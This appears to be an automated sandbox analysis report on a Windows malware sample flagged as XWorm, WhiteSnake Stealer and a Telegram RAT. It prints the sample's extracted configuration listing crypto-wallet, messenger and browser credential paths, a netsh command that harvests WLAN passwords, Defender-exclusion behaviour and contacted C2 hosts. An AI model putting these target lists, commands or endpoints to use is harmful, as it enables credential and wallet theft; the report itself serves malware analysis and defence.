                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C092808 GetSystemTime,SystemTimeToFileTime,BIO_ctrl,25_2_6C092808
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BA406 DeregisterEventSource,GetVersion,25_2_6C1BA406
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005EB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Yara detected WhiteSnake Stealer
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: tor-real.exe, 00000019.00000003.2480126236.0000000000F99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: electroncash
                Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 2iKqyuJTFpsXTtRw9pc8q8E38SzLcjAXXgfpuQw9044ON7ezDFP6911LpNxsu4gO2M2bDuH7YEkdMGBKv
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\Binance
                Source: ffmaba.exe, 0000000B.00000002.2257333436.0000000002831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tring><string>config.json;sql\db.sqlite</string><string>Grabber\Session</string></args></command><command name="0"><args><string>%AppData%\tox</string><string>*.db;*.tox;*.ini;*.json;*.hstr</string><string>Grabber\Tox</string></args></command><command name="0"><args><string>%AppData%\.purple</string><string>accounts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>*s;????????????????\*s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>*.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>*.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>*.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>*\*</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests*;PasswordMeta*;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
                Source: powershell.exe, 00000006.00000002.2116961691.0000000007BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                Source: ffmaba.exe, 00000013.00000002.4510696537.00000000030E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $cq%AppData%`,cqdC:\Users\user\AppData\Roaming`,cqdC:\Users\user\AppData\Roaming\ledger live
                Tries to harvest and steal WLAN passwords
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Telegram RAT
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Yara detected WhiteSnake Stealer
                Source: Yara matchFile source: Process Memory Space: ffmaba.exe PID: 5624, type: MEMORYSTR
                Yara detected XWorm
                Source: Yara matchFile source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: yt7dW9nyJK.exe PID: 5576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yt7dW9nyJK.exe PID: 2672, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B0CB0 BIO_bind,bind,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,25_2_6C1B0CB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B0DA0 BIO_listen,getsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,BIO_socket_nbio,setsockopt,BIO_ADDR_family,BIO_bind,ERR_put_error,listen,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,setsockopt,WSAGetLastError,ERR_put_error,ERR_put_error,WSAGetLastError,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1B0DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B0F53 listen,WSAGetLastError,ERR_put_error,ERR_put_error,25_2_6C1B0F53

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		21
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services12
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                Scheduled Task/Job                		12
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                File and Directory Discovery                		Remote Desktop Protocol2
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		Logon Script (Windows)1
                Scheduled Task/Job                		31
                Obfuscated Files or Information                		Security Account Manager26
                System Information Discovery                		SMB/Windows Admin Shares1
                Clipboard Data                		21
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell                		Login HookLogin Hook22
                Software Packing                		NTDS1
                Query Registry                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets651
                Security Software Discovery                		SSHKeylogging1
                Multi-hop Proxy                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials2
                Process Discovery                		VNCGUI Input Capture2
                Non-Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                Virtualization/Sandbox Evasion                		DCSync161
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal Capture13
                Application Layer Protocol                		Exfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API Hooking2
                Proxy                		Exfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Network Configuration Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1479415 Sample: yt7dW9nyJK.exe Startdate: 23/07/2024 Architecture: WINDOWS Score: 100 125 api.telegram.org 2->125 127 securefirewall.portmap.io 2->127 129 4 other IPs or domains 2->129 151 Found malware configuration 2->151 153 Malicious sample detected (through community Yara rule) 2->153 155 Sigma detected: Capture Wi-Fi password 2->155 159 17 other signatures 2->159 12 yt7dW9nyJK.exe 4 2->12         started        16 ffmaba.exe 2->16         started        18 ffmaba.exe 2->18         started        20 2 other processes 2->20 signatures3 157 Uses the Telegram API (likely for C&C communication) 125->157 process4 file5 117 C:\Users\user\AppData\...\yt7dW9nyJK.exe.log, ASCII 12->117 dropped 181 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->181 183 Found many strings related to Crypto-Wallets (likely being stolen) 12->183 185 Bypasses PowerShell execution policy 12->185 189 2 other signatures 12->189 22 yt7dW9nyJK.exe 15 4 12->22         started        27 powershell.exe 23 12->27         started        187 Adds a directory exclusion to Windows Defender 16->187 29 powershell.exe 16->29         started        31 powershell.exe 18->31         started        33 powershell.exe 20->33         started        35 powershell.exe 20->35         started        signatures6 process7 dnsIp8 131 ip-api.com 208.95.112.1, 49706, 49724, 80 TUT-ASUS United States 22->131 133 securefirewall.portmap.io 193.161.193.99, 31510, 49707 BITREE-ASRU Russian Federation 22->133 135 libyaalahrar.co 199.188.200.89, 443, 49708 NAMECHEAP-NETUS United States 22->135 115 C:\Users\user\AppData\Local\Temp\ffmaba.exe, PE32 22->115 dropped 177 Adds a directory exclusion to Windows Defender 22->177 37 ffmaba.exe 22->37         started        41 powershell.exe 23 22->41         started        43 powershell.exe 23 22->43         started        179 Loading BitLocker PowerShell Module 27->179 45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 conhost.exe 35->53         started        file9 signatures10 process11 file12 113 C:\Users\user\AppData\Local\...\ffmaba.exe, PE32 37->113 dropped 161 Multi AV Scanner detection for dropped file 37->161 163 Found many strings related to Crypto-Wallets (likely being stolen) 37->163 165 Adds a directory exclusion to Windows Defender 37->165 55 cmd.exe 37->55         started        58 powershell.exe 37->58         started        167 Loading BitLocker PowerShell Module 41->167 60 conhost.exe 41->60         started        62 conhost.exe 43->62         started        signatures13 process14 signatures15 169 Uses schtasks.exe or at.exe to add and modify task schedules 55->169 171 Uses netsh to modify the Windows network and firewall settings 55->171 173 Tries to harvest and steal WLAN passwords 55->173 64 ffmaba.exe 55->64         started        69 conhost.exe 55->69         started        71 chcp.com 55->71         started        75 2 other processes 55->75 175 Loading BitLocker PowerShell Module 58->175 73 conhost.exe 58->73         started        process16 dnsIp17 119 api.telegram.org 149.154.167.220, 443, 49727 TELEGRAMRU United Kingdom 64->119 121 185.119.118.59, 49726, 8080 IPAX-ASAT Austria 64->121 123 3 other IPs or domains 64->123 105 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 64->105 dropped 107 C:\Users\user\AppData\Local\...\tor-real.exe, PE32 64->107 dropped 109 C:\Users\user\AppData\...\tor-gencert.exe, PE32 64->109 dropped 111 8 other malicious files 64->111 dropped 143 Multi AV Scanner detection for dropped file 64->143 145 Queries sensitive video device information (via WMI, Win32_VideoController, often 